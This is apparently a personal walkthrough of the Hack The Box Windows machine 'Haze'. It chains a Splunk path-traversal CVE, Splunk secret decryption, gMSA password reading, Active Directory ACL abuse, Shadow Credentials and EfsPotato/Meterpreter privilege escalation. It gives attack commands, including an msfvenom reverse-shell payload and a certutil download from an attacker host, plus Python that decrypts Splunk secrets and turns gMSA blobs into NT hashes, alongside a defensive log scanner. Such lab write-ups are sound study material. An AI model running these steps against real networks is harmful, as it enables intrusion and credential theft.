HTB_Haze
Windows (Hard)
Summary
user.txt
CVE-2024-36991 -> splunksecrets -> shell as mark. mark.adams is in the gMSA_managers group, and gMSADumper.py reports:
Users or groups who can read password for Haze-IT-Backup$:
 > Domain Admins
python dacledit.py haze.htb/mark.adams:'?' -target-dn 'CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb'
# this shows that mark has write rights on the gMSA object
# in the mark shell:
Set-ADServiceAccount -Identity "B" -PrincipalsAllowedToRetrieveManagedPassword "A"
# then read its hash
Is there a way to make this change remotely? I didn't find one at the time.
WriteOwner right -> support_services group -> ForceChangePassword right -> shell as edward
root
-> read the backup file -> Splunk web admin -> Splunk shell -> msf (getsystem)
As for which sensitive Splunk files to target with the arbitrary file read: besides the documentation, GPT can list the paths accurately.
bloodhound.py error: ERROR: Could not find a domain controller. Consider specifying a domain and/or DNS server.
Pass -d xxx.htb (the domain itself); dc01 is not needed there.
msldap.commons.exceptions.LDAPBindException: LDAP Bind failed! Result code: "invalidCredentials" Reason: "b'8009030C: LdapErr: DSID-0C0906AD, comment: AcceptSecurityContext error, data 52e, v4f7c\x00'"
(data 52e is ERROR_LOGON_FAILURE: the DC rejected the credentials.)
This was strange: the hash I gave was definitely correct, and after taking a break it worked again.
References
Writeup
https://4xura.com/ctf/htb/htb-writeup-haze
Splunk documentation
https://docs.splunk.com/Documentation/Splunk/9.4.1/Admin/Listofconfigurationfiles
Splunk security advisories (historical exploits)
https://advisory.splunk.com/advisories
CVE-2024-36991
Arbitrary file read via path traversal:
https://www.vicarius.io/vsociety/posts/exploiting-path-traversal-in-splunk-cve-2024-36991
https://www.sonicwall.com/blog/critical-splunk-vulnerability-cve-2024-36991-patch-now-to-prevent-arbitrary-file-reads
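The requests that trigger this kind of bug are easy to spot after the fact. As an added example (not from the writeup or from the linked posts), the Python below scans web access-log lines, percent-decodes each request path repeatedly to defeat double encoding, and flags any path that contains a `..` segment or a Windows drive letter, reporting the normalised target. The log lines and the `/en-US/modules/messaging/` paths in them are constructed to resemble the traversal pattern the linked posts describe; they are not captured traffic.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the box): a normal request, a plain
# traversal, a double-encoded traversal, a drive-letter variant with and without
# dot-dot segments, and a normal request with a query string.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Apr/2025:10:00:01 +0000] "GET /en-US/app/launcher/home HTTP/1.1" 200 5120
10.10.14.5 - - [01/Apr/2025:10:00:02 +0000] "GET /en-US/modules/messaging/../../../../etc/passwd HTTP/1.1" 200 1337
10.10.14.5 - - [01/Apr/2025:10:00:03 +0000] "GET /en-US/modules/messaging/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 200 1337
10.10.14.5 - - [01/Apr/2025:10:00:04 +0000] "GET /en-US/modules/messaging/C:/../../../../Windows/win.ini HTTP/1.1" 200 92
10.10.14.5 - - [01/Apr/2025:10:00:05 +0000] "GET /en-US/modules/messaging/C:/Windows/win.ini HTTP/1.1" 404 0
10.10.14.5 - - [01/Apr/2025:10:00:06 +0000] "GET /en-US/static/app/search/main.js?v=1 HTTP/1.1" 200 8192
"""

REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/')
DRIVE_RE = re.compile(r"[A-Za-z]:")


def full_decode(path: str, rounds: int = 3) -> str:
    """Percent-decode until the path stops changing (bounded), so %252e%252e -> .. is caught."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify_path(raw_path: str):
    """Return a reason string if the request path looks like traversal, else None."""
    path = full_decode(raw_path.split("?", 1)[0]).replace("\\", "/")
    segments = path.split("/")
    if ".." in segments:
        # Splunk Web URLs never legitimately contain a dot-dot segment.
        return "dot-dot traversal -> " + posixpath.normpath(path)
    if any(DRIVE_RE.fullmatch(s) for s in segments):
        # A drive letter inside a URL path only makes sense to someone probing a Windows host.
        return "drive letter in URL path"
    return None


def scan_access_log(text: str):
    """Yield (line number, raw path, reason) for every suspicious request in the log."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQ_RE.search(line)
        if not m:
            continue
        reason = classify_path(m.group("path"))
        if reason:
            findings.append((lineno, m.group("path"), reason))
    return findings


if __name__ == "__main__":
    for lineno, path, reason in scan_access_log(SAMPLE_LOG):
        print(f"line {lineno}: {path}  [{reason}]")
```

Note the 404 on the drive-letter-only line: a failed probe is still worth an alert, since the attacker usually iterates on depth until a 200 comes back.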
splunksecrets
https://github.com/HurricaneLabs/splunksecrets.git
from cryptography.hazmat.decrepit.ciphers.algorithms import ARC4
ModuleNotFoundError: No module named 'cryptography.hazmat.decrepit'
$ pip show cryptography
Name: cryptography
Version: 42.0.8
(The hazmat.decrepit module only exists from cryptography 43.0 onward, so 42.0.8 cannot satisfy that import.)
Installing an older version didn't help either; in the end, following the writeup, I created a virtualenv first and installed the requirements inside it, and then it worked:
python -m venv venv
source venv/bin/acti*
pip install -r requirements.txt
pip install click
python s*s.py
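It helps to know what splunksecrets actually computes, so the dependency problem above can be sidestepped or the result sanity-checked by hand. The block below is an added example, not the tool's own code: a `$7$` value is AES-256-GCM (16-byte IV prefix, 16-byte tag suffix) under a key derived with PBKDF2-HMAC-SHA256 from the first 254 bytes of splunk.secret (salt "disk-encryption", 1000 iterations); the legacy `$1$` value is the plaintext XORed with a repeating "DEFAULTSA" mask, NUL-terminated, then RC4-encrypted with the first 16 bytes of splunk.secret. The `$1$` path is pure stdlib; the `$7$` path needs the `cryptography` package. `SAMPLE_SECRET` is constructed; a real one lives in $SPLUNK_HOME/etc/auth/splunk.secret, and the encrypted values come from files such as etc/system/local/authentication.conf.

```python
import base64
import hashlib
import itertools
import os

# Constructed sample splunk.secret (real ones are 254 random printable bytes).
SAMPLE_SECRET = (b"ExampleSplunkSecret-" * 13)[:254]


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); symmetric, so it both encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _mask_defaultsa(data: bytes) -> bytes:
    # Splunk XORs each byte with the repeating string "DEFAULTSA". A byte equal to its
    # mask byte is left alone so that a 0x00 never appears inside the C string; the
    # same rule applied twice is therefore its own inverse.
    return bytes(b if b == m else b ^ m for b, m in zip(data, itertools.cycle(b"DEFAULTSA")))


def splunk_encrypt_v1(secret: bytes, plaintext: str) -> str:
    masked = _mask_defaultsa(plaintext.encode()) + b"\x00"
    return "$1$" + base64.b64encode(rc4(secret[:16], masked)).decode()


def _v7_key(secret: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", secret[:254], b"disk-encryption", 1000, dklen=32)


def splunk_encrypt_v7(secret: bytes, plaintext: str, iv: bytes = b"") -> str:
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM
    iv = iv or os.urandom(16)
    ct_and_tag = AESGCM(_v7_key(secret)).encrypt(iv, plaintext.encode(), None)
    return "$7$" + base64.b64encode(iv + ct_and_tag).decode()


def splunk_decrypt(secret: bytes, ciphertext: str) -> str:
    """Decrypt either format, dispatching on the $1$/$7$ prefix."""
    if ciphertext.startswith("$1$"):
        raw = rc4(secret[:16], base64.b64decode(ciphertext[3:]))
        return _mask_defaultsa(raw[:-1]).decode()  # drop the trailing NUL
    if ciphertext.startswith("$7$"):
        from cryptography.hazmat.primitives.ciphers.aead import AESGCM
        raw = base64.b64decode(ciphertext[3:])
        iv, ct_and_tag = raw[:16], raw[16:]  # AESGCM expects ciphertext||tag
        return AESGCM(_v7_key(secret)).decrypt(iv, ct_and_tag, None).decode()
    raise ValueError("unknown Splunk ciphertext format")


def aesgcm_available() -> bool:
    try:
        from cryptography.hazmat.primitives.ciphers.aead import AESGCM  # noqa: F401
        return True
    except ImportError:
        return False


if __name__ == "__main__":
    v1 = splunk_encrypt_v1(SAMPLE_SECRET, "ch4ng3m3")
    print(v1, "->", splunk_decrypt(SAMPLE_SECRET, v1))
    if aesgcm_available():
        v7 = splunk_encrypt_v7(SAMPLE_SECRET, "ch4ng3m3")
        print(v7, "->", splunk_decrypt(SAMPLE_SECRET, v7))
```

With the backup's splunk.secret read as bytes, `splunk_decrypt(secret, value)` reproduces what `splunksecrets splunk-decrypt` prints; a wrong or truncated secret shows up as a GCM tag failure on `$7$` values, not as silent garbage.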
gMSADumper
https://github.com/micahvandeusen/gMSADumper.git
Viewing ACLs
https://www.thehacker.recipes/ad/movement/dacl/
Inspect
# 1. PowerShell
Get-ADServiceAccount -Identity 'Haze-IT-Backup' -Properties *
# 2. Python
python dacledit.py haze.htb/mark.adams:'?' -target-dn 'CN=?,CN=?,DC=haze,DC=htb'
Set: grant A a given right on B
# PowerShell
Set-ADServiceAccount -Identity "B" -PrincipalsAllowedToRetrieveManagedPassword "A"
Read B's msDS-ManagedPassword
1. python ~/htb/tools/bloodyAD/blo*.py --host dc01.haze.htb -d "HAZE.HTB" --dc-ip $ip -u mark.adams -p '?' get object 'B' --attr msDS-ManagedPassword
2. crackmapexec ldap $ip -u mark.adams -p '?' --gmsa
3. gMSADumper.py ....
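All three commands end up doing the same thing with the attribute they read back. As an added example (not the writeup's or gMSADumper's own code), the Python below parses the MSDS-MANAGEDPASSWORD_BLOB structure (MS-ADTS 2.2.20) carried in msDS-ManagedPassword and turns the current and previous passwords into NT hashes with a stdlib-only MD4, since hashlib's MD4 is often disabled under OpenSSL 3. `build_blob` and the sample passwords are constructed for offline use; a real gMSA password is 256 random bytes, not a word.

```python
import struct


def _lrot(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320."""
    M = 0xFFFFFFFF
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    r3_order = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1: F, message words in order
            a = _lrot((a + F(b, c, d) + X[i]) & M, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: G, words 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a = _lrot((a + G(b, c, d) + X[k] + 0x5A827999) & M, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3: H, bit-reversed word order
            a = _lrot((a + H(b, c, d) + X[r3_order[i]] + 0x6ED9EBA1) & M, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & M, (b + bb) & M, (c + cc) & M, (d + dd) & M
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password_utf16le: bytes) -> str:
    """NT hash = MD4 over the UTF-16LE password bytes, no salt."""
    return md4(password_utf16le).hex()


def parse_managed_password_blob(blob: bytes) -> dict:
    """Parse MSDS-MANAGEDPASSWORD_BLOB as returned in msDS-ManagedPassword."""
    version, _reserved, length, cur_off, prev_off, qpi_off, upi_off = struct.unpack_from("<HHIHHHH", blob, 0)
    if version != 1 or length != len(blob):
        raise ValueError("not a version-1 managed password blob")
    # Both passwords are NUL-terminated UTF-16LE strings. The current one runs up to the
    # previous-password offset, or to the query-interval offset when there is no previous one.
    cur_end = prev_off if prev_off else qpi_off
    current = blob[cur_off:cur_end]
    previous = blob[prev_off:qpi_off] if prev_off else b""
    strip = lambda s: s[:-2] if s.endswith(b"\x00\x00") else s
    query_interval, = struct.unpack_from("<Q", blob, qpi_off)        # 100ns units until next query
    unchanged_interval, = struct.unpack_from("<Q", blob, upi_off)    # 100ns units password stays valid
    return {
        "current": strip(current),
        "previous": strip(previous),
        "query_interval_100ns": query_interval,
        "unchanged_interval_100ns": unchanged_interval,
    }


def gmsa_hashes(blob: bytes) -> dict:
    """Current and previous NT hashes; the previous one matters right after a rotation."""
    fields = parse_managed_password_blob(blob)
    return {
        "current_nt": nt_hash(fields["current"]),
        "previous_nt": nt_hash(fields["previous"]) if fields["previous"] else None,
    }


def build_blob(current: str, previous: str = "") -> bytes:
    """Constructed sample blob for offline testing (assumption: layout only, no padding)."""
    cur = current.encode("utf-16-le") + b"\x00\x00"
    prev = previous.encode("utf-16-le") + b"\x00\x00" if previous else b""
    cur_off = 16
    prev_off = cur_off + len(cur) if previous else 0
    qpi_off = cur_off + len(cur) + len(prev)
    upi_off = qpi_off + 8
    body = cur + prev + struct.pack("<QQ", 36_000_000_000, 24 * 36_000_000_000)
    header = struct.pack("<HHIHHHH", 1, 0, 16 + len(body), cur_off, prev_off, qpi_off, upi_off)
    return header + body


if __name__ == "__main__":
    print(gmsa_hashes(build_blob("password", previous="Passw0rd!")))
```

Feed the raw attribute bytes from an LDAP read (which only succeeds for a principal listed in the gMSA's msDS-GroupMSAMembership, which is exactly what the Set-ADServiceAccount change above grants) to `gmsa_hashes`; the resulting NT hash is what you pass-the-hash with as Haze-IT-Backup$.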
WriteOwner
https://medium.com/@offsecdeer/a-practical-guide-to-rbcd-exploitation-a3f1a47267d5
Three steps
bloodyAD: take ownership, set the DACL, add to the group
set owner
add genericAll
add groupMember
python ~/htb/tools/bloodyAD/blo*.py --host dc01.haze.htb -d "HAZE.HTB" --dc-ip $ip -u 'B' -p Lhash:rhash set owner 'CN=C?,CN=USERS,DC=HAZE,DC=HTB' 'B'
... add genericAll 'CN=C?,CN=USERS,DC=HAZE,DC=HTB' 'B'
... add groupMember 'CN=C?,CN=USERS,DC=HAZE,DC=HTB' 'B'
ForceChangePassword
https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
Besides changing the password with net rpc or bloodyAD.py, you can use Shadow Credentials to obtain edward's NT hash without touching his existing password.
Still after becoming a member of support_services:
... add shadowCredentials 'ed?'
[+] Saved PEM certificate at path: xxxx_cert.pem
[+] Saved PEM private key at path: xxxx_priv.pem
openssl pkcs12 -export -out xxxx.pfx -inkey xxxx_priv.pem -in xxxx_cert.pem
Enter Export Password:                # just press Enter
Verifying - Enter Export Password:
sudo ntpdate $ip                      # sync the clock first: PKINIT fails on Kerberos clock skew
certipy-ad auth -pfx xxxx.pfx -u 'edward.martin' -domain haze.htb -dc-ip $ip -debug
[*] Got hash for 'edward.martin@haze.htb': aad3?04ee:....xxxx?
Splunk RCE
https://github.com/0xjpuff/reverse_shell_splunk
How was this found? Searching GitHub for "splunk shell"? Can you even search like that? Huh? How would anyone think to search that way? Answer me! And it's from 2018, hmm, 0.0
SeImpersonatePrivilege
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.html?highlight=SeImpersonatePrivilege#printspoofer
EfsPotato
https://github.com/zcgonvh/EfsPotato
# for 4.x
csc.exe EfsPotato.cs -nowarn:1691,618
csc /platform:x86 EfsPotato.cs -nowarn:1691,618
# for 2.0/3.5
C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe EfsPotato.cs -nowarn:1691,618
C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe /platform:x86 EfsPotato.cs -nowarn:1691,618
# compile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618
usage: EfsPotato <cmd> [pipe]
    pipe -> lsarpc|efsrpc|samr|lsass|netlogon (default=lsarpc)
certutil -urlcache -split -f http://kali/EfsPotato.exe C:\temp
Downloading it this way didn't work, hmm.
I just used upload from the edward shell instead.
*Evil-WinRM* PS C:\temp> upload ../../htb/tools/EfsPotato.exe
./EfsPotato.exe "whoami"
./EfsPotato.exe "type C:\....*.txt"
./EfsPotato.exe "cmd.exe"
But it doesn't display the txt contents and doesn't spawn a new shell, so I had to fall back on msf, whose getsystem does the privesc itself; it was also uploaded to temp via the edward shell.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.xxxx LPORT=3434 -f exe -o reverse.exe
meterpreter > getsystem
meterpreter > cat C:\...*.txt
Originally published on the WeChat official account 羽泪云小栈: HTB_Haze